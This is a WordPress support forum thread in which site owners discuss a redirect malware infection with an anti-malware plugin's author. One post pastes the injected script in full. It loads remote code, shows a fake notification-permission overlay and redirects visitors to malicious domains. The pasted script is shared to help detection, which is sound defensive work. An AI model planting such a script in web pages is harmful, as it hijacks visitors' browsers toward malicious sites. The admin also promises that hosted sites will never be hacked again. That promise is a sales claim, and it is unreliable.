Unable to clear redirect malware

Home Forums Support Forum Unable to clear redirect malware

This topic contains 9 replies, has 3 voices, and was last updated by  Anti-Malware Admin 8 months, 2 weeks ago.

Viewing 10 posts - 1 through 10 (of 10 total)
  • Author
    Posts
  • #2337

    Hi

    I’ve run the various scans several times and quarantined 1000s of files. the scans aren’t currently finding anything BUT I am still having issues with my site redirecting to dodgy pages.

    Can anyone help? Am I going to have to re-install everything?

    #2338

    Anti-Malware Admin
    Key Master

    It looks like there is one script leftover, maybe in your theme’s header.php file. If you can send me your header.php file then I will add this new threat to my definition updates.

    #2339

    Thanks – I’ve emailed you

    #2340

    Robert C.
    Member

    i have similar issue: pages are redirecting, scan is not picking this up but

    malware identified as rogueads.afu?3 by securi
    sdk.onPermissionDefault(() => {window.location.replace(“//ellcurvth.com/afu.php?zoneid=2826294″)});
    have not as yet completely cleaned the site,  i provide services to charity and community orgs in my spare time and they’ve pretty much all been hit with same malware

    #2341

    Robert C.
    Member

    ok so ran a find on all wp files, ie checked all php and js files, then checked keywords in wp database using myphp, and found that all the malware scripts have been added to the page content. This was true for another site i cleaned last week.

    here is the embedded script below for your info… oh and i had to deactivate bakery plugin, and use classic mode to edit page in raw/html (for reference sites were running php 7.0 or 1 or 2, they are now all on 7.3, all themes and plugins and wp versions were set to auto update, themes have been popular ones such as avada, betheme, enfold, theGem:

    <script>
    const overlayTranslations = {"en":{"title":"Attention!","description":"Click “Allow” to subscribe to notifications and continue working with this website."}};
    const overlay = {"delay":3000,"overlayStyle":{"background":"rgba(0,0,0, 0.6)"},"title":"Attention!","description":"Click “Allow” to subscribe to notifications and continue working with this website.",...(overlayTranslations[navigator.language.slice(0, 2).toLowerCase()]||Object.values(overlayTranslations)[0])};
    const s = document.createElement('script');
    s.src='//humsoolt.net/pfe/current/tag.min.js?z=2774009';
    s.onload = (sdk) => {
    sdk.updateOptions({overlay, overlayTranslations})
    sdk.onPermissionDefault(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
    sdk.onPermissionAllowed(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
    sdk.onPermissionDenied(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
    sdk.onAlreadySubscribed(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
    sdk.onNotificationUnsupported(() => {});
    }
    document.head.appendChild(s);
    </script>
    <script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type='text/javascript' src='//pl15180773.pvclouds.com/2b/e2/3d/2be23d024eff3a5446e06744968768be.js'></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script>

    hope this helps

    any tips for prevention gladly received

    #2342

    Robert C.
    Member

    … malware also found in image descriptions, and custom footer, and page/post revisions… sigh (it’s not as if there was no protection on the site)

    #2343

    Anti-Malware Admin
    Key Master

    I have just released a definition update for this new threat. Please make sure that you have the latest definition updates and run the complete scan again. That should find and fix this threat throughout your database.

    #2346

    Robert C.
    Member

    @ELI

    Many thanks, even tho i cleaned the database, double checked pages and other content myself, your plugin still found and Fixed 34 occasions that were not picked up by other methods…

    A big thank you.!!!

    #2348

    Robert C.
    Member

    Your plugin is probably now my favourite… and unfortunately it’s getting used quite a lot, as the redirect script is still getting into one of my sites running theGem theme.

    site doesn’t have related posts plugin, and I have checked functions.php

    Is my next task to reload fresh plugins and a fresh wp? any tips gratefully received.

    I have other security plugins running, maybe that’s counter-productive?

    Can you drop me a line about your hosting service?

    (sorry bombarding you with multiple questions)

    #2360

    Anti-Malware Admin
    Key Master

    I would hope that you don’t have to completely reload your site from scratch. If you want to send me the URL then I can take a look at it for you.

    My plugin should run smoothly in conjunction with other security plugins, although I have had instances come up in the past with some other firewall filters that block my definition updates and even one instance of a firewall rule that blocked my scan page, but you can usually white-list these occurrences or disable the other firewall if it does interfere.

    My Super Secure Hosting is available for $12/month per site to those who really need a place where their site will not be reinfected again. I recommend it for sites that are pro to attack or sites that just won’t stay clean on their current server. Once they are hosted on one of my servers they will not get hacked again.

Viewing 10 posts - 1 through 10 (of 10 total)

You must be logged in to reply to this topic.

Comments are closed.